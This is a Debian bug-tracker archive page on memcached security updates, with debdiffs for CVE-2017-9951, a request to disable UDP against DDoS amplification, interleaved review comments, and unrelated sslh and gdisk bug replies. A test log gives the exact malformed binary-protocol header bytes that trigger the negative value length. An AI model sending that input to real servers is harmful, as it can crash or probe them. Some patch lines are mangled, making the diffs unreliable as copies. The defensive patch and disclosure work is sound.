Bug#873758: stretch-pu: package memcached/1.4.33-1

2018-03-08 Thread Guillaume Delacour
Hi,

I'm sorry I haven't found a sponsor to upload the security fix for CVE-2017-9951
yet.
There is another fix that needs to be uploaded to security: CVE-2018-1000115:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name       Version   Architecture Description
+++-==========-=========-============-=============================================
ii  memcached  1.4.33-1  amd64        high-performance memory object caching system

$ sudo netstat -ltunp | grep memcached
tcp        0      0 0.0.0.0:11211   0.0.0.0:*   LISTEN   31885/memcached
tcp6       0      0 :::11211        :::*        LISTEN   31885/memcached
udp        0      0 0.0.0.0:11211   0.0.0.0:*            31885/memcached
udp6       0      0 :::11211        :::*                 31885/memcached

Versus:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name       Version          Architecture Description
+++-==========-================-============-=============================================
ii  memcached  1.4.33-1+deb9u1  amd64        high-performance memory object caching system

$ sudo netstat -ltunp | grep memcached
tcp        0      0 0.0.0.0:11211   0.0.0.0:*   LISTEN   478/memcached
tcp6       0      0 :::11211        :::*        LISTEN   478/memcached

Please find attached the following debdiff.

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog	2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog	2018-03-08 13:46:07.0 +0100
@@ -1,3 +1,15 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+  * Fix CVE-2018-1000115
++ debian/patches/10_CVE-2018-1000115.patch disable listening on UDP port by
+  default (from Ubuntu)
++ debian/NEWS add explanation and document how to re-enable UDP if
+  necessary.
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Thu, 08 Mar 2018 13:46:07 +0100
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
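Review bot: neither bullet in the new 1.4.33-1+deb9u1 stanza carries a "Closes:" reference, so the upload will not close the reports tracking these fixes (#868701 for CVE-2017-9951 and #891907 for the UDP default, both in this thread); consider adding one to each bullet. The first bullet also reads better as "commands that add or replace a key/value pair".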
diff -Nru memcached-1.4.33/debian/NEWS memcached-1.4.33/debian/NEWS
--- memcached-1.4.33/debian/NEWS	2016-07-02 10:24:46.0 +0200
+++ memcached-1.4.33/debian/NEWS	2018-03-08 13:46:07.0 +0100
@@ -1,3 +1,11 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * memcached is now configured to disable its UDP port by default, to
+prevent its use as a DDoS amplifier. To re-enable UDP service, add
+'-U 11211' to /etc/memcached.conf and restart the memcached service.
+
+ -- Steve Beattie <sbeat...@ubuntu.com>  Fri, 02 Mar 2018 12:52:44 -0800
+
 memcached (1.4.20-1) unstable; urgency=medium
 
 Starting with this release, a system user "memcache" will be created.
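Review bot: the re-enable instruction in the NEWS text ("add '-U 11211' to /etc/memcached.conf") says nothing about the listen address, so an administrator who follows it on a host that listens on a non-loopback address brings back the amplifier the entry warns about; add a sentence telling them to keep the listener on 127.0.0.1 or to firewall 11211/udp. The trailer also keeps the Ubuntu author and date under a Debian version header; consider signing the entry as the uploader and crediting Ubuntu in the text, as the changelog does.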
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch	1970-01-01 01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch	2018-03-06 21:44:06.0 +0100
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 1
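Review bot: in the items.c hunk, "if (nbytes < 2)" uses a bare 2 with no comment, and the patch header says only "sanity check"; add a one-line comment stating why 2 is the minimum and a short description in the patch header, so the check is not mistaken for dead code later. The debdiff is also cut off here, so 10_CVE-2018-1000115.patch and the debian/patches/series change named in the changelog cannot be reviewed from what is visible.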

Bug#891907: memcached should disable UDP by default

2018-03-06 Thread Guillaume Delacour
Hi,

On 02/03/2018 at 12:39, Hanno Böck wrote:
> Package: memcached
> Version: 1.4.33-1
> 
> Memcached is currently involved in some massive ddos attacks, see e.g.:
> https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
> 
> The UDP protocol of memcached can be abused for very effective DDoS
> amplification attacks and should therefore be considered dangerous.
> Upstream memcached has reacted to this by disabling UDP by default:
> https://github.com/memcached/memcached/wiki/ReleaseNotes156
> 
> In Debian memcached by default only listens to 127.0.0.1, but enables
> UDP. While the localhost-only protects default settings, it's still
> only a minor change away from creating an effective DDoS tool for a
> protocol that is hardly in use today. I recommend that you backport
> the upstream change and disable UDP by default.
> 

The version 1.5.6 will be uploaded in the archive in a few days.
I'll try to propose a backport patch at least for versions in stretch
and jessie (with upstream review, if possible).

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature


Bug#863517: sslh systemd service file doesn't honor /etc/default/sslh

2018-03-03 Thread Guillaume Delacour
Hi,

On 28/05/2017 at 00:09, Cord Beermann wrote:
> Package: sslh
> Version: 1.18-1
> Severity: normal
> 
> Hello,
> 
> I want to use sslh.service with the sslh-select option, but in
> /lib/systemd/system/sslh.service is /usr/sbin/sslh hardcoded. 
> 
> It should use the information in /etc/default/sslh instead (or switch over
> to update-alternatives?)

systemd does not support a variable in ExecStart:

# service sslh status
● sslh.service - SSL/SSH multiplexer
   Loaded: error (Reason: Invalid argument)
[...]
[/lib/systemd/system/sslh.service:8] Executable path is not absolute,
ignoring: $DAEMON --foreground $DAEMON_OPTS

One other way is to wrap the startup, or use alternatives.
I'll look into this.

> 
> Cord
> 
> -- System Information:
> Debian Release: 8.8
>   APT prefers stable
>   APT policy: (999, 'stable'), (799, 'stable-updates'), (798, 
> 'proposed-updates'), (500, 'oldstable'), (299, 'testing'), (199, 'unstable'), 
> (1, 'experimental')
> Architecture: amd64 (x86_64)
> 
> Kernel: Linux 4.9.0-0.bpo.3-amd64 (SMP w/2 CPU cores)
> Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: systemd (via /run/systemd/system)
> 
> Versions of packages sslh depends on:
> ii  adduser  3.113+nmu3
> ii  debconf  1.5.56
> ii  init-system-helpers  1.22
> ii  libc6                2.19-18+deb8u9
> ii  libcap2  1:2.24-8
> ii  libconfig9   1.4.9-2
> ii  libwrap0 7.6.q-25
> ii  lsb-base 4.1+Debian13+nmu1
> ii  update-inetd 4.43
> 
> Versions of packages sslh recommends:
> ii  apache2 [httpd]  2.4.10-10+deb8u8
> ii  openssh-server [ssh-server]  1:6.7p1-5+deb8u3
> 
> Versions of packages sslh suggests:
> ii  openbsd-inetd [inet-superserver]  0.20140418-2
> 
> -- debconf information:
> * sslh/inetd_or_standalone: standalone
> 

-- 
Guillaume Delacour





Bug#888529: memcached: Systemd private tmp breaks unix socket access to memcached

2018-03-03 Thread Guillaume Delacour
tags 888529 + moreinfo
thanks

Hi,

On 26/01/2018 at 19:57, Dennis Boone wrote:
> Package: memcached
> Version: 1.5.4-1
> Severity: important
> 
> After applying this version the other night, our application was no
> longer able to connect to memcached via its unix socket.  (Since the
> systemd private tmp functionality is a damned rootkit, it took a while to
> diagnose this problem.)  The distributed configuration file appears to
> place the unix socket in /tmp.

The distributed configuration file does not provide a socket file
enabled; where is the socket you've defined with options "-s,
--unix-socket=" ?

Provided config files:
https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/memcached.conf
&&
https://github.com/memcached/memcached/blob/master/scripts/memcached.service
&&
https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/patches/02_service_wrapper.patch

> 
> If systemd private tmp is to be enabled for memcached, the distributed
> configuration should place the unix socket elsewhere.  Alternately,
> private tmp could be disabled for memcached.
> 
> 
> -- System Information:
> Debian Release: buster/sid
>   APT prefers unstable
>   APT policy: (500, 'unstable')
> Architecture: amd64 (x86_64)
> 
> Kernel: Linux 4.14.0-3-amd64 (SMP w/8 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8) (ignored: 
> LC_ALL set to es_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: 
> LC_ALL set to es_US.UTF-8)
> Shell: /bin/sh linked to /bin/bash
> Init: systemd (via /run/systemd/system)
> 
> Versions of packages memcached depends on:
> ii  adduser 3.116
> ii  libc6   2.26-5
> ii  libevent-2.1-6  2.1.8-stable-4
> ii  libsasl2-2  2.1.27~101-g0780600+dfsg-3
> ii  lsb-base        9.20170808
> ii  perl            5.26.1-4
> 
> memcached recommends no packages.
> 
> Versions of packages memcached suggests:
> pn  libanyevent-perl 
> pn  libcache-memcached-perl  
> pn  libmemcached 
> ii  libterm-readkey-perl 2.37-1+b2
> pn  libyaml-perl 
> 
> -- no debconf information
> 

-- 
Guillaume Delacour





Bug#870819: gdisk: New upstream version 1.0.3 available

2017-09-20 Thread Guillaume Delacour
Hi,

On Sat, 5 Aug 2017 16:12:54 +0200 Christoph Biedl
<debian.a...@manchmal.in-ulm.de> wrote:
> Package: gdisk
> Version: 1.0.1-1
> Severity: normal
> 
> Dear Maintainer,
> 
> upstream released a new version recently. Looking into the changes I
> found the following:
> 
> | Fixed a major bug that caused invalid partition tables to be generated
> | under some conditions.
> 
> In my humble opinion this justifies a swift upload of the new version.
> There are also some interesting changes listed for 1.0.2

I've prepared a new version on mentors and have such bug reports against
upstream code to changes/discuss. I've asked upstream some help to
triage them.

If no news is received in the next few days, I'll try to contact my sponsor
to upload the new upstream release "as is".

> 
> Christoph
> 

-- 
Guillaume Delacour





Bug#702963: gdisk doesn't align the end of partition

2017-09-20 Thread Guillaume Delacour
Hi,

On Wed, 13 Mar 2013 17:11:32 +0400 sergio <mail...@sergio.spb.ru> wrote:
> Package: gdisk
> Version: 0.8.5-1
> Severity: important
> 
> gdisk doesn't align the end of partition:
> 
> 
> % dd if=/dev/zero of=test count=22
> % /sbin/gdisk test
> 
> Command (? for help): o
> This option deletes all partitions and creates a new protective MBR.
> Proceed? (Y/N): Y
> 
> Command (? for help): n
> Partition number (1-128, default 1): 
> First sector (34-199968, default = 2048) or {+-}size{KMGTP}: 
> Last sector (2048-199968, default = 199968) or {+-}size{KMGTP}: 
> 
> 

Sorry for my very late answer. Did you reproduce that on Debian 9
Stretch with release 1.0.1 ? Upstream has made many improvements in this
release.

-- 
Guillaume Delacour





Bug#778325: sgdisk --new changes given end sector parameter when using a unit for the start sector

2017-09-20 Thread Guillaume Delacour
Hi,

On Fri, 13 Feb 2015 15:31:32 + Fabian Niepelt
<f.niep...@mittwald.de> wrote:
[...]
>
> I'm on Debian 7.0, amd64.
> 

Sorry for the lack of answer. Do you have the same problem on Debian
Stretch with version 1.0.1 ?

-- 
Guillaume Delacour





Bug#873758: stretch-pu: package memcached/1.4.33-1

2017-09-12 Thread Guillaume Delacour


On 12/09/2017 at 22:55, Adam D. Barratt wrote:
> On Tue, 2017-09-12 at 22:52 +0200, Guillaume Delacour wrote:
>> On 30/08/2017 at 21:58, Adam D. Barratt wrote:
>>> Control: tags -1 + confirmed
>>>
>>> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>>>> The attached patch fix CVE-2017-9951 which has been not fixed via a DSA,
>>>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/868701.
>>>
>>> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
>>> +
>>> +  * Non-maintainer upload by the Security Team.
>>>
>>> So far as I can tell, you're not a member of the Security Team, so this
>>> is incorrect.
>>
>> Sure, please find attached the fixed debdiff, as I'm not a member of the
>> security team. I've also changed the distribution from stretch to
>> stretch-security.
> 
> Why? "stretch-security" is an appropriate distribution to use for
> uploads to the security archive, in which case you should be talking to
>  the Security Team, not us. Assuming you're still proposing an update
> via proposed-updates and a point release, "stretch" was correct.

Indeed, absolutely right. Updated version attached.

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,10 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-25 
00:38:52.0 +0200
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
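Review bot: in the conn_swallow case of the memcached.c hunk, "if (c->sbytes <= 0)" lets a negative count pass as a finished swallow, which hides the fact that an earlier length calculation produced a negative value; consider logging the value in verbose mode or closing the connection on that path, and say in the patch header which of the two changes is the primary check.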
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch




Bug#873758: stretch-pu: package memcached/1.4.33-1

2017-09-12 Thread Guillaume Delacour
On 30/08/2017 at 21:58, Adam D. Barratt wrote:
> Control: tags -1 + confirmed
> 
> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>> The attached patch fix CVE-2017-9951 which has been not fixed via a DSA,
>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/868701.
> 
> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
> +
> +  * Non-maintainer upload by the Security Team.
> 
> So far as I can tell, you're not a member of the Security Team, so this
> is incorrect.

Sure, please find attached the fixed debdiff, as I'm not a member of the
security team. I've also changed the distribution from stretch to
stretch-security.

> 
> +  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
> +replaces key/value pair
> +
> + -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
> 
> Please go ahead, bearing in mind the above comment.

As I'm not a DD nor DM I can't upload this directly; could you do this
for me as mentoring?
I also need to provide this kind of change for Jessie.

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,10 @@
+memcached (1.4.33-1+deb9u1) stretch-security; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
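Review bot: the new stanza names "stretch-security" as its distribution, which is the suite for uploads to the security archive, while this request (stretch-pu) goes through proposed-updates and a point release; set the distribution back to "stretch".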
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-25 
00:38:52.0 +0200
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch




Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function

2017-07-24 Thread Guillaume Delacour
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed.
> 

Please find attached the debdiff for Debian 9 Stretch.
Also, you can find a little test case (and results) without
(CVE-2017-9951_1.4.33.log) and with the fix (CVE-2017-9951_1.4.33_fixed.log).
I've built and tested it on a clean stretch schroot.

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,11 @@
+memcached (1.4.33-1+deb9u1) unstable; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
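Review bot: the new stanza targets "unstable" although its version is 1.4.33-1+deb9u1; a +deb9u1 upload should name the stretch suite it is meant for. The "Non-maintainer upload by the Security Team." bullet should stay only if the Security Team makes the upload.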
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-24 
21:59:20.0 +0200
@@ -0,0 +1,37 @@
+From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch
<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26   0x00 0x00 0x00 0x82
>26   0x00 0x00 0x00 0x1d
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
26: going from conn_mwrite to conn_swallow
26: going from conn_swallow to conn_new_cmd
26: going from conn_new_cmd to conn_parse_cmd
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26   0x00 0x00 0x00 0x82
>26   0x00 0x00 0x00 0x1d
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
Failed to write, and not due to blocking: Broken pipe
26: going from conn_mwrite to conn_closing
<26 connection closed.
26: going from conn_closing to conn_closed
<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
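
The length arithmetic behind the "Value len is -33" line in the log above, as an added example (not code from memcached or from the debdiff): it parses the 24 logged header bytes, reproduces the negative length, applies the same threshold as the patch's "nbytes < 2" test, and adds a stricter 64-bit check. The struct, the function names, the "+ 2" for a trailing "\r\n" and the 1 MiB value limit are assumptions of the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define HEADER_LEN 24
#define MAX_VALUE_LEN (1024 * 1024) /* assumed limit for this example */

/* Fields of the binary-protocol request header that take part in the length sum. */
struct bin_header {
    uint8_t  magic, opcode, extlen;
    uint16_t keylen;
    uint32_t bodylen;
};

enum len_verdict { LEN_OK, LEN_TRUNCATED, LEN_BODY_TOO_SHORT, LEN_VALUE_TOO_LARGE };

/* Request header bytes exactly as printed in the verbose log on this page. */
static const uint8_t LOGGED_HEADER[HEADER_LEN] = {
    0x80, 0x12, 0x00, 0x01,  0x08, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xe8,  0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00,
};
/* Constructed sample: key 1 byte, extras 8 bytes, value 5 bytes (body 14). */
static const uint8_t WELL_FORMED_HEADER[HEADER_LEN] = {
    0x80, 0x12, 0x00, 0x01,  0x08, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x0e,
};
/* Constructed sample: body (4 bytes) shorter than key + extras (9 bytes). */
static const uint8_t SHORT_BODY_HEADER[HEADER_LEN] = {
    0x80, 0x12, 0x00, 0x01,  0x08, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x04,
};

/* Decode the big-endian header fields; refuse buffers shorter than a header. */
static bool parse_header(const uint8_t *buf, size_t len, struct bin_header *h) {
    if (buf == NULL || len < HEADER_LEN)
        return false;
    h->magic   = buf[0];
    h->opcode  = buf[1];
    h->keylen  = (uint16_t)((buf[2] << 8) | buf[3]);
    h->extlen  = buf[4];
    h->bodylen = ((uint32_t)buf[8] << 24) | ((uint32_t)buf[9] << 16) |
                 ((uint32_t)buf[10] << 8) | (uint32_t)buf[11];
    return true;
}

/* body - (key + extras) stored in a 32-bit signed int: this is where -33 comes from. */
static int32_t naive_value_len(const struct bin_header *h) {
    uint32_t u = h->bodylen - ((uint32_t)h->keylen + h->extlen); /* wraps mod 2^32 */
    return (u <= (uint32_t)INT32_MAX) ? (int32_t)u
                                      : (int32_t)(u - 0x80000000u) + INT32_MIN;
}

/* Same threshold as the patch's "if (nbytes < 2) return false;". */
static bool size_check_like_patch(int32_t vlen) {
    int64_t nbytes = (int64_t)vlen + 2; /* assumed: value plus trailing "\r\n" */
    return nbytes >= 2;
}

/* Stricter variant: do the subtraction in 64 bits and bound the result. */
static enum len_verdict check_lengths(const uint8_t *buf, size_t len) {
    struct bin_header h;
    if (!parse_header(buf, len, &h))
        return LEN_TRUNCATED;
    int64_t vlen = (int64_t)h.bodylen - h.keylen - h.extlen;
    if (vlen < 0)
        return LEN_BODY_TOO_SHORT;
    if (vlen > MAX_VALUE_LEN)
        return LEN_VALUE_TOO_LARGE;
    return LEN_OK;
}

int main(void) {
    static const char *names[] = { "ok", "truncated", "body too short", "value too large" };
    struct bin_header h;
    if (!parse_header(LOGGED_HEADER, HEADER_LEN, &h))
        return 1;
    printf("keylen=%u extlen=%u bodylen=0x%08x\n",
           (unsigned)h.keylen, (unsigned)h.extlen, (unsigned)h.bodylen);
    printf("value length as 32-bit int: %d\n", (int)naive_value_len(&h));
    printf("passes the nbytes >= 2 check: %s\n",
           size_check_like_patch(naive_value_len(&h)) ? "yes" : "no");
    printf("logged header:      %s\n", names[check_lengths(LOGGED_HEADER, HEADER_LEN)]);
    printf("well-formed header: %s\n", names[check_lengths(WELL_FORMED_HEADER, HEADER_LEN)]);
    printf("short-body header:  %s\n", names[check_lengths(SHORT_BODY_HEADER, HEADER_LEN)]);
    return 0;
}
```
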

Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function

2017-07-24 Thread Guillaume Delacour
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> 
> Please adjust the affected versions in the BTS as needed.

Please find attached the debdiff for Debian 8 Jessie.
Also, you can find a little test case (and results) without
(CVE-2017-9951_exploit.log) and with the fix (CVE-2017-9951_fixed.log).
I've built and tested it on a clean jessie schroot.

> 
> Regards,
> Salvatore
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog
--- memcached-1.4.21/debian/changelog   2016-11-01 21:10:45.0 +
+++ memcached-1.4.21/debian/changelog   2017-07-24 20:07:10.0 +
